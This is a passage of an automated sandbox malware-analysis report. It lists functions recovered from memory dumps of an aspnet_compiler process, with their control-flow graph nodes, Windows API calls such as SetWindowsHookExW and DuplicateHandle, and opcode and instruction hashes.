                                                                                                          • Instruction ID: 9ca9abcb8aee8e5db99a0e5016b9fd0bf3e14ee3858dd599349744d1130444da
                                                                                                          • Opcode Fuzzy Hash: ba74d8c609175796a372507617bafbeffd878fa625501a3b672b3f737fc37973
                                                                                                          • Instruction Fuzzy Hash: 2621E0B59002499FDB10CFAAD884AEEBFF5FB48310F14841AE918A7350D378A950CFA5
                                                                                                          Function 00CC7EC8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 184 cc7ec8-cc7f5c DuplicateHandle 185 cc7f5e-cc7f64 184->185 186 cc7f65-cc7f82 184->186 185->186
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CC7F4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: f0655049bff72ac8e4650621046473d10bc3c107c72a5657282a25b690776f5a
                                                                                                          • Instruction ID: 3ee93004750cec4874cb7337fd92d56432f5bfbab05b4deb8bbb9b20d35f012f
                                                                                                          • Opcode Fuzzy Hash: f0655049bff72ac8e4650621046473d10bc3c107c72a5657282a25b690776f5a
                                                                                                          • Instruction Fuzzy Hash: 4021E4B59002099FDB10CFAAD884ADEFFF8FB48310F14841AE918A3350D374A940CFA4
                                                                                                          Function 00CC29C4 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 189 cc29c4-cc2a12 191 cc2a1e-cc2a50 SetWindowsHookExW 189->191 192 cc2a14 189->192 193 cc2a59-cc2a7e 191->193 194 cc2a52-cc2a58 191->194 195 cc2a1c 192->195 194->193 195->191
                                                                                                          APIs
                                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00CC2A43
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 2559412058-0
                                                                                                          • Opcode ID: f03d7f0b63c1aebf72c5d8262a12c4df29269b12bd4487c5ddfc2048e4601426
                                                                                                          • Instruction ID: d4768ad14eee7cca8a3af1d423b96df44e2dbd7296b6559368a641cd3414a1f0
                                                                                                          • Opcode Fuzzy Hash: f03d7f0b63c1aebf72c5d8262a12c4df29269b12bd4487c5ddfc2048e4601426
                                                                                                          • Instruction Fuzzy Hash: 84210475D002099FDB24DFA9D844BEEBBF5AF88720F10842AD419A7250C7749945CFA0
                                                                                                          Function 00CC29C8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 199 cc29c8-cc2a12 201 cc2a1e-cc2a50 SetWindowsHookExW 199->201 202 cc2a14 199->202 203 cc2a59-cc2a7e 201->203 204 cc2a52-cc2a58 201->204 205 cc2a1c 202->205 204->203 205->201
                                                                                                          APIs
                                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00CC2A43
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 2559412058-0
                                                                                                          • Opcode ID: 855e0bbd6ca4df8f6b1ded6e1b572e92382f5b029ebb5cdb2dc79cf9295b35b5
                                                                                                          • Instruction ID: db3dd67bd7c3ed484922700ee524ec6c3e917349155cde084928b05fbd77cb35
                                                                                                          • Opcode Fuzzy Hash: 855e0bbd6ca4df8f6b1ded6e1b572e92382f5b029ebb5cdb2dc79cf9295b35b5
                                                                                                          • Instruction Fuzzy Hash: 302115759002099FDB14DFAAC844BEEFBF5AF88710F108429D419A7250C774A944CFA0
                                                                                                          Function 00CCD518 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 209 ccd518-ccd574 211 ccd576-ccd59e KiUserCallbackDispatcher 209->211 212 ccd5c2-ccd5db 209->212 213 ccd5a7-ccd5bb 211->213 214 ccd5a0-ccd5a6 211->214 213->212 214->213
                                                                                                          APIs
                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00CCD58D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2492992576-0
                                                                                                          • Opcode ID: 69fc298a24542991dc63c4279e061a63f60339aeffc7061c6983ef1757c3da72
                                                                                                          • Instruction ID: 17ad5251a778cc8acd36d729aa78b2c7c7867765b274b795f42e5090a527f095
                                                                                                          • Opcode Fuzzy Hash: 69fc298a24542991dc63c4279e061a63f60339aeffc7061c6983ef1757c3da72
                                                                                                          • Instruction Fuzzy Hash: F411B1B1804389CEDB20DF95D4047EEBFF4AB05314F14406ED4A963742C3795684CFA2
                                                                                                          Function 00C6D3B4 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3894846003.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_c6d000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 82138535e1542a0189758659f45552d24d3a4dc0ea0e50814eb3e0139968d24b
                                                                                                          • Instruction ID: 608ed9356acce5d521072d1fe13aa86cf206b391cb8eb90727e041da41b62284
                                                                                                          • Opcode Fuzzy Hash: 82138535e1542a0189758659f45552d24d3a4dc0ea0e50814eb3e0139968d24b
                                                                                                          • Instruction Fuzzy Hash: 3D2125B1A04340DFDB24DF10D8C0B26BF65FB98324F20C569E90A0B256C736E856CBA2
                                                                                                          Function 00C7D0FC Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895072590.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_c7d000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: eb0e851ec837d1b12ce81b1b6651f47d75a1d6c867d1b7add8668c4bd6a6e109
                                                                                                          • Instruction ID: 0731e8ea95730fcdba0f5b4749ffb237d160d33906f392db8aa55e90b9995d64
                                                                                                          • Opcode Fuzzy Hash: eb0e851ec837d1b12ce81b1b6651f47d75a1d6c867d1b7add8668c4bd6a6e109
                                                                                                          • Instruction Fuzzy Hash: B521F2756043049FDB04DF10D984B2ABBB5FF88334F64C56DD80E4B296C33AD846CA61
                                                                                                          Function 00C6D3AF Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3894846003.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_c6d000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                          • Instruction ID: 86150cae8c67c46ebec22d7f01704f24ac0b3214078848456497f1dc2938753b
                                                                                                          • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                          • Instruction Fuzzy Hash: 6011E676A04280CFCB15CF10D5C4B26BF72FB94324F24C5A9D84A0B656C33AE956CBA1
                                                                                                          Function 00C7D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895072590.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_c7d000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                          • Instruction ID: 7cdf2035147cd14f2b2069e6680216dc2dc2317bca09b11f896c22c5a1081b82
                                                                                                          • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                          • Instruction Fuzzy Hash: F011BB79504284CFDB05CF10D9C4B19BBB2FB84324F28C6A9D84E4B696C33AD94ACB61